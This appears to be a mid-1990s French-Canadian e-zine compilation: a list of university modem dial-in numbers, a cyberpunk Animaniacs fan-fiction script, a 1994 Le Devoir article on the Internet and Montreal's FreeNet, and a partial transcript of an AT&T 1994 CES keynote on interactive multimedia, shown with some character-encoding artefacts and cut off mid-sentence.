Universite du Quebec … Hull [Hull, PQ] 819-595-2028 [V32]
Universite de Sherbrooke [Sherbrooke, PQ] 819-569-9041 [2400]
819-821-8025 [V32b-ZYX]
Bishop University [Sherbrooke, PQ] 819-822-9723 [2400]
Dalhousie University [Halifax, NS] 902-494-2500 [2400]
902-494-8000 [V32]
Saint Mary's University [Halifax, NS] 902-429-8270 [2400]
Technical Univ. of Nova Scotia [Halifax, NS] 902-425-0800 [2400]
Acadia University [Wolfville, NS] 902-542-5786 [V32]
University of Prince Edward Island [Charlottetown, PE] 902-566-0354 [2400]
McMaster University [Hamilton, ON] 905-570-1889 [2400]
905-570-1046 [V32]


-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------


FICTION ET COMPAGNIE

---------------


MIRRORSHADES MINDY

A Cyberpunk Fan-Fiction Cartoon by Stefan Gagne

All characters are copyright Warner Brothers and all that jive. Some (C)
William Gibson. Go read his books, they RULE!

(Animaniacs opener. Variable verse : "She's in painey," while pointing out the
crumpled up figure of Mrs. Fletcher at the bottom of a set of stairs, bent and
rusted walker off to the side.)

(Fade In)

(Buttons is on a field of grass and poppies and stuff.

MINDY : Buuuuttoons! Ohhh BUUUUUTTOOONSS!

(Buttons starts leaping over fences and stuff, as Mindy beckons him on. On the
final jump, he falls off a cliff.)

MH : (giggles) Silly Buttons!

(Buttons looks annoyed.)

(Title Card : MIRRORSHADES MINDY. Shows one of those blurry pixilated images
of Buttons' face ALA Gibson covers.)

(Shot is of an urban neighborhood. There is, believe it or not, some grass
here and an old, dead tree. Mindy is secured nicely with G-webbing in a child
harness, wandering around with a trode helmet on. Buttons, with cyber-assist
vision and headgear, is sleeping peacefully in a cardboard box. A woman, lower
torso to feet only, walks in. She has burgundy fingernails.)

MOLLY : You stay here, kid. Molly's gotta go earn us some dough
for food. Keep stimming your Blarney the
Quadruped tapes and I'll be right back.
MN : Okay nice lady!
ML : Call me Ma, kid, not Lady. And as for YOU, buttons, I don't wanna
hear ANY more stories about ripping the mailman's leg off. You know how
much we pay in premiums to FedEx already. GOT IT?
BUTTONS : Roof! (poorly samples dog bark)
ML : Case has got to retune that synth bark chip sometime soon.
(Molly wanders off. Mindy gurgles a bit.)

(Cut to shot of Mindy's stim tape, where a purple... something or other is
leading a bunch of children in song.)

BLARNEY : Hey, kids!
KIDS : What, Blarney? (In unison)
BL : Let's sing another song so we can forget all about that urban
hellzone we live in, and grow up safe and happy and naive!
KIDS : Gosh, that'd be fun, Blarney! (In unison)
BL : Well, just follow me, this way! (motions for the kids to follow.
'Camera' moves forward.)

(Cut back to reality. Mindy is trying to walk beyond her
'perimeter' to follow Blarney on tape.)

MN : Oof! (Pulled back by the G-Webbing.)

(A pair of taxis go roaring by, with gunfire noises as they shoot at each
other. A stray bullet hits the latch on Mindy's G-Web, and she falls out of
it. The cars roar around a corner, and one explodes violently, waking Buttons
up.)

BT : Rwolr?
MN : Blarney! (wanders out of the yard and into the streets.)
(Buttons notices this, smiles, and goes back to sleep. His comprehension chips
kick in moments later, and he is snapped to alertness as Mindy wanders into
oncoming traffic.)

BT : WOOF! (chases after her)

(Mindy wanders in and out of the trucks, which honk madly and swerve out of the
way as she follows the stim show. Buttons nervously makes his way through.)

(Buttons POV : Red infrared filter, with a green lockon box on Mindy. He
follows her around a corner.)

(Mindy's stim connection gets severed when someone throws a blood-stained knife
out the window, which passes behind her, but through the cord.)

MN : Huh? Blarney go byebye!

(Mindy, now seeing reality, wonders where she is. She pouts.)
MN : Want Blarney!

(A street hooker, previously concealed in shadows, steps up to Mindy.)

HOOKER : Hey. Psst. Kid.
MN : Hiya, nice lady!
HK : Ya wanna fix that deck of yours?
MN : Uh-huh uh-huh uh-huh!
HK : You wanna go see the Finn. He's just around the corner a few blocks
from here. Can't miss him. He fixes up my gear when I gotta record for a
trick, you know?
MN : Okay I luv you byebye!

(Mindy toddles off across an intersection)

(Yakko, Wakko, and Dot poke their heads in from stage left. Yakko and Wakko
ogle the prostitute.)

YAKKO AND WAKKO : Helloooo near-future Nurse!
DOT : (to the hooker) Boys. Go fig.

(A messenger biker swerves to avoid them and runs into Buttons, who is
entering. The Warners and the hooker flee, but the front wheel bumps off
Buttons' metal headgear.)

BT : Rowrof! (doggie whine)

(Buttons POV : Screen is garbled up a bit. He loses his lock on Mindy in the
static and sensitized noise.)

(Cut back to reality. Buttons is wandering around the Sprawl crowd, trying to
find his way.)

(Mindy looks up, at a large, fuzzy neon sign reading CHATSUBO.)
MN : Pretty color!

(Mindy wanders inside. Buttons follows, staggering from the encounter with the
biker.)

(Mindy wanders through a bunch of tables, and waddles up to the bar. She
crawls onto a barstool. A man with a pink plastic arm examines her oddly,
pausing in his bartop wiping activity.)
RATZ : This is no place for children, little girl. What do you
want?
MN : Finny! (points to her broken deck.)

(Another man wanders up to the bar.)

ANGUS : You want me to remove the kid, Ratz?
RATZ : No need, she is looking for the Finn. He's not here,
little girl. He is around the corner a block away, ya? MN : Ok I luv you
byebye! (she waves cutely and wanders out. Buttons is just now
approaching the bar.)
BT : Arf? (he points to his damaged head, and makes traces in the air
that are Mindy-shaped.)
RATZ : Vat is it, boy? Are you trying to tell me something?
(Buttons makes signals to indicate that he's looking for Mindy)
RATZ : Timmy fell down the manhole?

(Buttons makes appropriate hand guestures, which, in common sign language,
translate to 'I'm looking for a little kid with blonde hair that has a real
brown outline, not the cruddy black outline the rest of us have.')

RATZ : Angus! Go get the jaws of life, Timmy's apartment roof
just collapsed!
ANGUS : We don't HAVE any jaws of life, Ratz. Just a few crowbars
and a water pik.

(Buttons whimpers, and wanders out of the bar.)

(Mindy walks around the corner, where she bumps into a drug dealer and a sick-
looking guy.)

SICK GUY: Okay, that's two hundred new yen for the stash... ah...
who's the kid?
MN : Whatcha doin'?
DEALER : You a cop, kid?
MN : Noo... why?
DL : 'cuz I don't wanna get picked up again, that's why.
MN : Why?
DL : I don't wanna lose a day of sales in the cooler.
MN : Why?
DL : Because I wanna make money!
MN : Okay I luv you byebye!

(Mindy wanders off. The druggie looks at the dealer, confused.)
DL : Kids today.

(Buttons wanders in, and pokes the dealer with his nose.)

DL : Hey! Get lost, ya mangy mutt! I'm tryin' to do biz here. SG : Don'
worry, Mitch, I got 'im. (pulls out a shotgun with a laser sight)
BT : YIPE! (dodges as the SG pulls off a few blasts.)

(Buttons races down the grimy sidewalk, out of shot range.)
(Mindy walks by an apartment building. We can hear voices
above.)

VOICE1 : He burned out while jacked! The cops are gonna come
looking... whad'o we do with the body?
VOICE2 : Just toss the bastard out the window. Let the street deal
with it. Odds are some clinic'll strip him for bits anyway.

(A really fat guy comes sailing out of the window.)

BT : (noticing) GASP!

(Buttons pushes Mindy out of the way, and is flattened by the pale, chubby
corpse. There is a wed thud and a few limbs come off.)

BT : (muffled whine.)
MN : Buttons! (pulls the doggie out from under the body.
Buttons takes a deep breath, panting. Buttons notices a torn off leg
on the body, and noses it away in disgust.)
(There is a voice from the nearby alley)
FINN : Hey, who's out there?
MN : Hiyee! (wanders into the alley. Buttons follows.)

(We see a poorly-lit computer bank at the end of the alley, as well as various
bottles and crates. Some veves are drawn out in flour on the alley floor. A
light snaps on. The computer
speaks.)

FN : Who're you, kid? What're you doing out in the Sprawl? BT : Arf?
FN : Nice doggie. Reminds me of the one I had as a kid. Then again, why
am I telling you this? I gotta pair of shoes older than you. You gotta
SIN, kid?
MN : Why?
FN : So I can tell who the hell you are, kid.
MN : Why?
FN : So... ah, screw it. I'll just match your hair and eyes and crap in
the database... ah. Hey! You're Molly's little urchin, aren't you?
MN : Ladyee!
FN : Thought so. So what's wrong, kid? Lose your way home? MN : (gets all
sad) Blarnee. (shows the deck to the Finn) BT : Rowr... (points to his
damaged helmet)
FN : Geez, you two get into a brawl or something?! You're a mess!
Alright, hang on, maybe I can get something arranged.
(The screen fades, with a nice pan over of the city, and a
superimposed digital clock counts down about an hour.)

(Fade back to the alley, where a mechanic is putting finishing touches on
Button's gear with a sonic screwdriver.)

BT : Ruff!
MECHANIC: Hold still, will you? Damn dog...
FN : Hey, that's Molly's dog you're condemning. Put a sock in it. The
Oracle can zot you, you know.
MC : Alright, alright already. They're fixed up. I gotta job to do.
FN : Thanks Mac. I owe you one.

(The mechanic leaves)

FN : Alright kid, your deck's as good as new.
MN : Blarney! Hee hee hee.
FN : I've re-routed a computer sweep truck over here... you two get out in
the sidewalk, it'll take you home.
MN : Okay I luv you byebye!
FN : Yeah, whatever, kid.

(Buttons leads Mindy back out to the street. A robot-controlled street sweeper
roars by, brushing the toddler and the dog along.)
MN : Wheeee!
BT : (whimper)

(The sweeper collects other street garbage, including some
wrappers, a broken Mitsubank credit chip, and most of the dead hacker. The
sweeper continues along, to Molly's house, leaving them in the yard. Mindy
bounces off the astroturf lawn and lands back in her G-Web.)

(Molly walks in.)

ML : ...well, that deal was a bust... how ya doin', dear?
MN : Hello nice lady!
ML : It's MOM, Mindy.

(Molly turns to Buttons, who is piled in the garbage the sweeper picked up.
She notices the dead hacker's leg.)

ML : BUTTONS! I TOLD you not to dismember the mailman again! Bad dog!
BAD DOG!

(Buttons whimpers, and gives a 'I get NO respect' look at the camera. Iris
out.)

(Cut to commercial for Lucky Charms and the new chainsaw
marshmallow)
(Cut to commercial for the FWLS comic series, with fully rendered 3-D
backgrounds and digitized artwork, comic soon)
(Cut to commercial for silly, wacky, neato peachy keen fun on Saved by the
Bell)

(Scene : The park. Yakko, Wakko, and Dot run in. They stop.)
YAKKO : It's that time again.
WAKKO : Time to vote Democrat?
DOT : Time to get down with our bad selves?
YK : No, it's time to learn today's lesson. And to learn today's lesson,
we turn to... the Wheel of Morality!

(The wheel rolls in. Yakko spins it.)

YK : Wheel of Morality, turn turn turn. Tell us the lesson that we should
learn. Moral number five! And the moral of today's story is... Nobody
REALLY wants to see prodigy.com get usenet access.
DOT: How true.
WK : I may weep openly.

(They look stage left, go YIPE! and run off stage. Ralph runs in with the net,
shakes his fist in anger, and chases.)

(Run credits. Today's gag credit : Console Cowboy. Animation by TMS, the one
true movie house, and music by Vangelis. James Cameron directed.)

(The watertower door opens. Beavis and Butthead are in the door frame,
laughing.)

BEAVIS : Heheheheheh. Heh. The show's, like, over or
something. Go home and spank your monkey.
BUTTHEAD: AhhhhhHuhuhuhuh... I hate it when the shows over. Unless
it's a Slappy toon.
BEAVIS : Yeah, heheheh. She sucks.

(Slappy appears behind the cap of the water tower.)

SLAPPY : I heard that.

(Slappy tosses a large bomb into the tower, and slams the door. She vanishes.
You hear a muffled explosion and Beavis's
'Aaaaaah!' over the ending music.)

--
Stefan "Twoflower" Gagne, net.writer at large and all around weird character.
For information about the A Future We'd Like to See Cyberpunk Humor series,
finger this address. You'll get spammed with storyclips, information, and other
wacky stuff.


-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------

Read the News, don't believe the Hype!

by

Paranoid, Pawa, Messerschmitt and The PoSSe!



----------------------
From Le Devoir, Samedi 29 Janvier 1994

AUTOROUTES ELECTRONIQUES

Robert Dutrisac

La veille, la terre avait trembl‚ … Los Angeles. Les
communications t‚l‚phoniques r‚guliŠres ‚taient
interrompues. Riv‚es … leur ordinateurs, 200 per-
sonnes en Am‚rique du Nord dont 75 citoyens de
Los Angeles ‚changeaient sur le r‚seau Internet
au sein d'une sorte de piŠce ‚lectronique, un ap-
pel conf‚rence sur micro-ordinateurs.
Soudain, de Los Angeles parvient le message:
"Tout tremble extrˆmement fort. C'est ‚peurant!"
C'‚tait l'after shock tant craint qui avait lieu … l'ins-
tant mˆme, une secousse sismique qui a d‚pass‚ 5,5 …
l'‚chelle de Richter.
Un peu par hasard, Michel Dumais faisait partie de ces
personnes en communication directe avec ces citoyens de
Los Angeles … travers un Internet Relay Chat (IRC).
Le Minitel n'existe pas aux tats-Unis mais un instru-
ment beaucoup plus sophistiqu‚ s'est impos‚, de fa‡on
anarchique … partir des gouvernements, des universit‚s,
des chercheurs, des ‚tudiants qui voulaient communi-
quer entre eux par l'informatique. C'est le r‚seau Internet,
qui a connu ses premiers balbutiements il y a vingt ans et
qui est devenu une autoroute ‚lectronique … laquelle sont
reli‚s ses pendants canadien, Ca*Net, et qu‚b‚cois,
RISQ. Une autoroute qui forment des ®communaut‚s vir-
tuelles¯ r‚unis autour d'int‚rˆts qu'elles partagent.
Selon les plus r‚centes ‚valuations, 15 millions de per-
sonnes utiliseraient le r‚seau Internet et ses
composantes nationales, … travers le monde, un
nombre qui double … tous les neuf mois.
L'annuaire des utilisateurs d'Internet et des
services auxquels il donne accŠs compte 1200
pages. On Y d‚nombre 50 000 ®serveurs¯, qui
sont autant de ®noeuds¯, de r‚seaux locaux ou
de banque de donn‚es. Il existe quelque 7500
groupes d'int‚rˆt sur ce r‚seau Internet, des
gens qui s'int‚ressent … la physique nucl‚aire, …
la m‚decine, aux automobiles de collection, … la
peinture, au th‚ƒtre et … la masturbation. Tous
les go–ts sont dans la nature et sur Internet.
Michel Dumais est un abonn‚ de ces r‚seaux
mais … travers un fournisseur qui lui vend des
heures fixes d'utilisation. Il lui en co–te 30$ par
mois pour une utilisation de deux heures par se-
maine.

[Atreid- Hummm... Serait-ce une erreur de transcription de
l'article? Parce que … ma connaissance, CAM ‚tait trŠs bon march‚
et deux heures par semaine pour 30$ par mois, c'est encore plus
cher que l'UVAL! Hummm... C'est plus probablement deux heure par
jour pour 30$ par mois... Enfin...]

En groupant les temps d'usage du r‚-
seau t‚l‚phonique, des petites soci‚t‚s comme
Communication Accessible Montr‚al, le fournisseur de
M. Dumais, a permis le branchement ‚conomique d'une
foule d'individus.
Ž l'heure actuelle, il y a beaucoup d'activit‚s non com-
merciales sur ce r‚seau: du courrier et des "conversa-
tions" ‚lectroniques, de l'‚change de logiciels qui sont en-
tr‚s dans le domaine public, de la consultation de
banques de donn‚es publiques, un accŠs … certaines ren-
seignements gouvernementaux, des magazines sp‚ciali-
s‚s traitant, en autre, d'informatique, certaines pages de
Mother Jones pour en donner un aper‡u et de Wired, le
magazine des branch‚s d'Internet. "Le r‚seau est fait
comme une toile d'araign‚e", illustre M. Dumais.

Situation incongrue dans le systŠme capitaliste

Personne n'est propri‚taire du r‚seau, bien qu'un lobby
form‚ de grands conglom‚rats de la t‚l‚phonie et de la
cƒblodistribution aux tats-Unis trouvent cette situation
intenable et cherchent les moyens de s'en emparer.
"C'est quelque chose de tout … fait incongru dans notre
systŠme capitaliste", constate M. Dumais. Des gens com-
me Mitch Caper, l'ex- pr‚sident de la compagnie de logi-
ciels Lotus, avec son Entreprise Frontier Foundation, "ne
veut pas qu'on touche … Internet" et insiste que l'informa-
tion qui circule dans le r‚seau demeure ®libre et acces-
sible¯, relate M. Dumais.
Au cours des demiŠres ann‚es, on a vu l'‚closion de r‚-
seaux locaux et communautaires, appel‚s FreeNet. Au
Canada, on en retrouve … Toronto, en Colombie-Britan-
nique et dans la r‚gion d'Ottawa. Ž Montr‚al, rien de tel
encore.
Le 1er mars prochain, le FreeNet de Montr‚al tiendra
son assembl‚e de fondation en une soci‚t‚
sans but lucratif. Michel Dumais pr‚side le
comit‚ organisateur qu'on peut rejoindre au
388-7289.
Selon son ‚valuation, il faudra environ
250 000$ pour lancer le r‚seau, de l'argent qui
proviendra essentiellement de commandi-
taires, ainsi qu'un certain nombre de b‚n‚-
voles et l'appui des municipalit‚s, des univer-
sit‚s, des groupes communautaires et de l'en-
treprise priv‚e.
Ces derniŠres ann‚es, le secteur priv‚ a d‚-
velopp‚ des applications pour ce r‚seau qui
sont accessibles moyennant finance. Ainsi,
Dow Jones, le fil ‚lectronique d'informations
financi‚res ‚manant du Wall Street Journal,
est d‚sormais disponible sur Internet. Compu-
serve, une filiale de H & R Block, donne accŠs
… une centaine de banques de donn‚es, tout
comme GEnie, Dialog et, au Canada, Infomart
une filiale du groupe Southam.
®Le r‚seau commence … ˆtre s‚rieusement
engorg‚¯, indique M. Dumais, ce qui entraŒne
des lenteurs aux heures de grande utilisation. Il
existe d'ailleurs un code d'‚thique informel sti-
pulant qu'un usager, s'il n'utilise pas Internet
dans le cadre de son travail mais pour son plai-
sir, doit le faire en dehors des heures ou-
vrables, entre 7h30 et 18h30, heure du serveur.
Que ce soit aux tats-Unis ou au Canada -
avec le projet CANARIE dans lequel le gouver-
nement f‚d‚ral et le secteur veulent investir
155 millions$ en deux ans, on s'attŠle mainte-
nant … multiplier par 20, par 100 ou par 1000 la
vitesse des r‚seaux, de l…, … augmenter le
nombre d'usagers potentiel.
Mais c'est aussi un moyen d'‚largir la sophistication des
produits disponibles sur les r‚seaux. Par exemple, des en-
cyclop‚dies multim‚dia, qu'on dit "hypertext", pourront
devenir accessibles, avec image digitalis‚e, texte et son,
comme on les retrouve aujourd'hui sur des CD-ROM, ces
disques compacts qui remplacent les disquettes.
On peut penser ‚galement qu'on pourra ‚galement di-
gitaliser des films et les distribuer via CANARIE.
Yves Daoust, vice-pr‚sident de la Soci‚t‚ d'information
nationale, qui ‚dite des banques sur

  
CD-ROM et pour le
r‚seau dont la revue de presse ‚lectronique L'Actualit‚,
est quelque peu surpris de l'importance que l'on accorde
… cette soit-disant "autoroute". "Ce qui mŠne pr‚sente-
ment, c'est la tuyauterie. Pour le moment, c'est un march‚
de professionnels; ce qui compte, c'est de savoir combien
le grand public voudra payer pour de l'information ‚lec-
tronique", livre-t-il.
Au Canada, le march‚ des banques de donn‚es ‚lertro-
niques et services connexes n'atteint 225 millions$ par an-
n‚e en comparaison avec les 5 milliards$ aux tats-Unis.
"Nous sommes sous-d‚velopp‚s", estime M. Daoust.

[Atreid- Il vient de se rendre compte de ‡a lui!]


- 30 -

[Atreid- V'l… du stock d'un pote de Montr‚al qui nous a tap‚
quelques textes, Messerschmitt, on l'en remercie...]


HOTT -- Hot Off The Tree electronic serial Issue 94.01.26 (pre-
relaunch)

Note: The following text was transmitted to the subscriber list
about two weeks ago. It has generated a lot of interest; hence,
I've chosen to post this speech to selected USENET groups.
Also, revised subscription information follows the speech.

WINTER CONSUMER ELECTRONICS SHOW 1994 KEYNOTE SPEECH

Thursday, 6 January 1994

Speaker: Robert Kavner, Executive Vice President and
Chief Executive Officer for Multimedia Products and
Services, AT&T


Thank you, Gary (Gary J. Shapiro, Group Vice President,
Electronic Industries Association/Consumer Electronics Group).
I'm honored to be here.

Being given the opportunity to be the keynote speaker at the
Winter CES is truly humbling.

I've thought long and hard about what would be an appropriate
topic for today.

And as I considered alternatives, I kept coming back to wanting
to talk about intelligence -- intelligence that is being put into
networks and intelligence that is being put into consumer
electronics.

The marriage of that intelligence will give new meaning to
freedom, personal choice and individuality.

Because the microprocessor and software is proliferating from $25
devices to million dollar network switches, and from a tool at
the office to appliances in our kitchen, to learning in our den
and to entertainment in our living room.

What I'd like to do with the brief time we have together, is to
describe the reality of the new network world, what AT&T is doing
to show leadership in helping to bring order to this revolution,
and to point out threats to the future health of our industry.

Some refer to the marriage of intelligence in networks and the
intelligence in devices as the interactive multimedia revolution.

I ask your permission to use that expression, even though it is
over used and little-understood.

There are two opposing business models for interactive
multimedia. One model -- a customer-focused model to which AT&T
subscribes -- sees an open access, competitive marketplace that
promotes people connecting with people.

A prototype for thinking about this "open access" model is the
enormous success generated by today's communications networks.
When the new interactive networks enable anybody to reach any
content and anyone else, anywhere in the world, it will stimulate
a bigger artistic, scientific, and economic revolution for the
21st century than the industrial revolution did for the 20th
century.

But there is another business model.

We call it the "gatekeeping" model: a closed access, non-
competitive marketplace that looks an awful lot like the model
prevailing today in the cable industry.

A good way to understand the ramifications of the gatekeeping
model is to talk to TV producers, as I have, who've tried for the
past 20 years to get their ideas and programs through the cable
industry's gate. It's roughly akin to picnicking with a tiger.
You might enjoy the meal, but the tiger always eats last.

We believe today's cable industry gatekeeping model would stifle
commercial and creative potential *if* it were recreated in the
new interactive multimedia world. We believe it's a threat to
the very survival of the consumer electronics industry. And
that's why I'm bringing it up today.

The questions I will try to illuminate are two: First, will the
company that owns the local cable or local telephone distribution
have the right to be the gatekeeper in deciding what interactive
content will be made available into American homes?

And second, will the gatekeeper use the rental set-top box model
as a way to dictate what type of intelligent terminals and
software the consumer must use to access interactive content --
and push the consumer electronics industry into making low margin
monitors and accessory devices?

Those are very live and unanswered questions. The people in this
room have a great deal of ability to influence the answers.

I'm going to come back to these questions because I would like
you to think about the answers and the *urgency* for us to act on
them. Everywhere we turn these days we hear about convergence.
We began to plan for the convergence of computers and
communications several years ago. For example, AT&T has a large
consumer electronics business, and lately, we're finding more and
more need to walk across the hall to talk with those who run our
network.

Why is that? Because a lot of our consumer electronics are
becoming increasingly intelligent terminals on the network. The
telephone is not just a consumer electronics device. It is a
gateway to the network; and we and others will be improving the
intelligence of these terminals to include the functionality of
PCs, game machines, faxes, cameras, TV monitors, and more.

(PAUSE HERE)

The power of networking reaches every home and office. The world
of interactive multimedia will reveal networking in its most
liberating and fertile new persona -- finding vast potential
latent in older concepts like "neighborhood" and "meeting" and
"relationships" and "information" and "news."

The new networked electronics devices are global; they're
democratic; they're the central agent of change in our changing
sense of community --offering tremendous potential to bring
people together to build bridges and break down barriers. In a
moment, I'll give examples of how our sense of community could be
enhanced.

First, let's take a look at the communications side of the
business.

The current communications industry in the United States looks
like this: a ubiquitous telephone service supporting a wide
variety of end devices.

It enables anyone to reach anyone else, anywhere in the world --
wired or wireless.

Though its infrastructure is complex, access is simple -- a
touch-tone pad. And access is open.

Running parallel is the entertainment side, whose distribution
into the home is the purview of the cable companies -- today
bolted to end users. Consumer access to entertainment content is
rigidly orchestrated. To get content onto cables, content owners
must cut a deal with the powerful tigers of the cable industry.

The consumers' access terminal is the set-top box, which they
must rent from the cable company. Consumers cannot buy the box
from the consumer electronics distributors.

In the cable companies' current business model, they are the only
retail distributor to the consumer. This enables the cable
company to maximize profits by taking margins from content, from
distribution of that content, and from renting the set-top box.

(PAUSE HERE)

A fairly recent and promising development is the new interactive
narrowband services through the public switched network. These
information, game, and "chat" services are gaining subscribers
daily. We believe they're the Neanderthal men of the interactive
multimedia world, because you will soon see more sophisticated
and user-friendly versions of these services. They will be
designed to take advantage of the higher digital bandwidths that
are becoming available.

(PAUSE HERE)

As everyone knows, some local exchange carriers have been forming
strategic alliances with cable companies. They have been very
vocal about big plans to deploy interactive networks -- to make
cable systems two-way and local phone systems broadband. We
encourage them to avoid the "gatekeeping" model and to adopt the
open access, competitive marketplace model.

Some of these mergers and alliances have generated great optimism
and public attention. Since then, many articles have been
written about this new world -- asking how much is hype, and how
much is reality. I thought it would be useful for us to have
some facts. Because there is reality in the opportunity and
reality in the threat.

Which makes the business model question an extremely important
one. AT&T knows the buildout is real because, as a systems
integrator and technology provider, we're a leading supplier and
moving force in that buildout -- in our own networks as well as
those belonging to the cable and local telephone companies.

As we continue our public debate on the business model issue,
AT&T is vigorously helping network providers -- of all kinds --
to plan and build networks that can begin to capture the
opportunities. A year from now, we'll see them appearing in a
number of communities across the United States.

Let's start with AT&T's network, with more than two billion
circuit miles of digital transmission today -- more than 90% on
fiber optics with multiple-gigabit capacities. Our network's
brains are distributed in more than 130 digital switches, as well
as hundreds of computers that carry signaling traffic, store data
bases, and manage a growing variety of customized business and
residential services.

Another vivid example is what Pacific Telephone announced with
AT&T in November: a $16 billion capital investment to upgrade
five million subscribers to broadband capabilities by the end of
the decade. The buildout begins this year in four high-density
regions of California. We know that other telephone companies
are actively planning similar buildouts.

There's no doubt that, by the end of the decade, we'll have
networks in many cities capable of going broadband, two-way
video, in and out of millions of homes.

As the broadband systems go in, existing infrastructures are
getting a new lease on life through Integrated Services Digital
Network, or ISDN. Since 1988, AT&T has deployed wideband ISDN --
which can deliver high-quality, color images simultaneously with
voice and data -- at more than 300 locations in America, and in a
dozen countries abroad. AT&T is a major supplier of ISDN to the
local exchange carriers.

The seven Regional Bell Operating Companies and the largest
independent telephone companies have filed more than 200 ISDN
tariffs in 46 states, the majority already in effect. By the end
of this year there will be 66 million ISDN-capable local access
lines -- which could support simultaneous voice, data, and image
services. In a little more than three years, 70% of all access
lines in this country will be ISDN-capable.

These new digital capabilities are affecting businesses in a big
way --right now. The majority of medium- and large-size
businesses in this country today have access to high capacity
networks that carry video --and that's two-way video! Let me
repeat that, because it's not well known. Businesses can go two-
way video today. And, interactive, two-way entertainment,
information, and education services for business will be coming
fast in the next several years.

Now let me talk about networking for consumers. It's going to be
a big addressable market in this decade. Fiber deployment, ISDN
deployment, some of the initiatives I just mentioned all point to
one reality: In a short time we will see a vast improvement in
local access capability. Look at the investments some cable
companies and local access companies are putting in: Within five
years, Bell Atlantic anticipates delivering video services to the
top twenty markets in the U.S. U.S. West in conjunction with
Time-Warner recently announced a $5 billion plan to upgrade their
cable network.

The race towards interactive multimedia into the home has begun
in a big way. Not every home in America will be able to carry
two-way video by the end of the decade. But there's no doubt
that in high-population areas we're going to see rapid deployment
of two-way video networks.

What is the DNA driving the interactive multimedia evolution?
You can say it really began 26 years ago with another Neanderthal
man of interactive multimedia, 800 toll-free service. You may
not know this, but AT&T's 800-number business represents 40% of
total calls made last year -- that's 12 billion 800 calls.

The success of 800 toll-free service shows that Americans have
learned to use the network for more than voice conversation. It
shows that Americans have learned to use the network for
transactions -- that's why it is a precursor for interactive
multimedia.

We gave consumers and content providers easy access to the
network; they used it creatively and passionately, with great
entrepreneurial spirit. And faster than we ever expected, the
technology changed the way humans behaved and interacted.

The growth of on-line hosting services is another example of DNA.
There are more than 50 on-line services available today, with
seven million subscribers -- not including the fast-growing
Internet, which is subsidized by the government. And the highest
growth segment is consumers!

Over four million consumers use on-line network services from
their home: gaming networks, chatlines, discussion groups,
marketing workshops, libraries, graphics, shopping and travel
services, a panoply of interactivity. They're attracting
entrepreneurs, artists, engineers, and visionaries who draw
inspiration from this new form of interaction.

They're using it to enhance their knowledge and to satisfy their
desire for relationships. And this is happening even though
these services are somewhat crude today with limited interactive
capabilities. Yet it's an open access model -- that's why
they're growing.

You can get content variety by choosing, and you don't have to
rent the modem or PC. It is important for us to understand why
these services are growing in popularity: They give people what
they want without interference. As we look ahead to interactive
multimedia, we must ask ourselves: Isn't easy access to content
what we really want? And if that's true, how can we make it
happen?

Who will bring the thousands of formats and programs and
relationship-enhancers into millions of consumer's homes? Who
will convert this content from analog to digital, make it secure,
and deliver it rapidly upon request?

And who will perform the back-office work -- recording the
transactions, reporting them, billing for them -- the myriad
detail needed to support such complexity? It's what we at AT&T
call "the missing industry" --converting content into digital
form and distributing it to customers through networks.

It is an attractive market opportunity because this missing
industry will evolve into a "hosting industry" that creates a
global market for full-motion video, interactive multimedia
services. Let me give you a primitive yet exciting example of
hosting that's available today.

The only dedicated gaming network in today's narrowband world is
ImagiNation Network, in which we are a part-owner -- and, more
importantly, with whom we are working to develop new services.
It has advanced graphics and lots of interactive flexibility. As
people use this communications-intensive service, they're seeing
its potential and adapting it to their life-styles.

We are often asked why are we working with this small, online
network? We are working with ImagiNation Network to find ways
that people can use the network to strengthen their sense of
community. And games are a big application area.

As networks grow more capable and as people use them in different
ways, another interesting thing happens: the products and devices
attached to them also evolve.

A new generation of intelligent, highly-functional terminals --
is being shaped, pushing our creative energies to give the
consumer more than a telephone or a modem to access the network.
To give you a taste of what's in store, I'll take a peek at one
service we will announce in the next hour, and three new
multimedia network products we have at the show.

This morning we're announcing a cornerstone of AT&T's evolving
multimedia family. It's called AT&T PersonaLink Services. And
it uses General Magic's breakthrough technology Telescript to
create "intelligent assistants" (Editor's note: Usually referred
to as "Intelligent Agents".) that allow individual customers to
personalize the network.

PersonaLink combines our services and those from third parties
with products from companies such as Sony, Motorola, Apple,
Matsushita, Phillips, and EO to make possible these new
communications opportunities. The press conference announcing
PersonaLink will start soon after I'm done here. (Editor's note:
The General Magic press release and related articles in Fortune
and Newsweek will be highlighted as the lead feature in the first
issue of the reinvented HOTT electronic serial.)

AT&T is also showing three important new multimedia products in
our booth. The first is a breakthrough technology, VoiceSpan.
"AT&T VoiceSpan" is a standard-setting brand you'll be seeing in
a variety of new business and communications applications from
both AT&T and other companies. With VoiceSpan we can use a
regular analog telephone line and talk and fax to each other
simultaneously. With VoiceSpan we can talk to each other and
manipulate the data on each other's computer screens without
needing another connection. With VoiceSpan kids can play an
interactive game on the network and talk to each other at the
same time! This technological achievement is part of the DNA
driving the interactive multimedia revolution.

A natural fit with VoiceSpan is our Edge-16 communications
device. It's a specialized modem that turns a home videogame
into a terminal on the network. With Edge-16, players in
separate parts of the world can play a video game with each
other. Today we think of telephones, PCs, and fax machines as
networked -- now, with Edge-16, game machines are connected home
to home and player to player. On the show floor, I'm playing an
interactive game over the public switched network using an
Edge-16 with the President of Sega (of America), Tom Kalinske.

Another piece of the DNA is our EO personal communicators. EO is
a portable, hand-held multimedia "appliance" that is really a
remote controller to the network, accessing a variety of
information and transaction services, games and messages. You
can write on its screen with an electronic pen, and send
handwritten notes through the network. EO sends and receives
faxes and e-mail. You can even use it to make a phone call. EO
is another example of how the telephone is putting the computer
into service as its accessory, not the other way around.

To create the finest interactive networking applications, we must
be attuned to the needs of the consumer. You may not know that
we are providing the underlying technology, products and systems
integration for a ground breaking test of interactive services
that will begin tying into thousands of households on Viacom's
cable system in Castro Valley, California.

The benefits of these new networks are found in the ability of
kids in different cities to call each other on a rainy day and
play a game together over the network using VoiceSpan technology.

They don't just play the game -- they visit -- they find what is
emotionally nourishing and build their relationship. The game
just facilitates their interaction.

It's the ability for me to call my daughter who lives in San
Francisco and spend an hour with her shopping in the network. We
don't just shop; we talk -- we give opinions. When you walk in
the mall you pay as much attention to each other as you do the
stores -- the social experience makes it rich. And so you'd have
that in the network, with simultaneous voice and video, and all
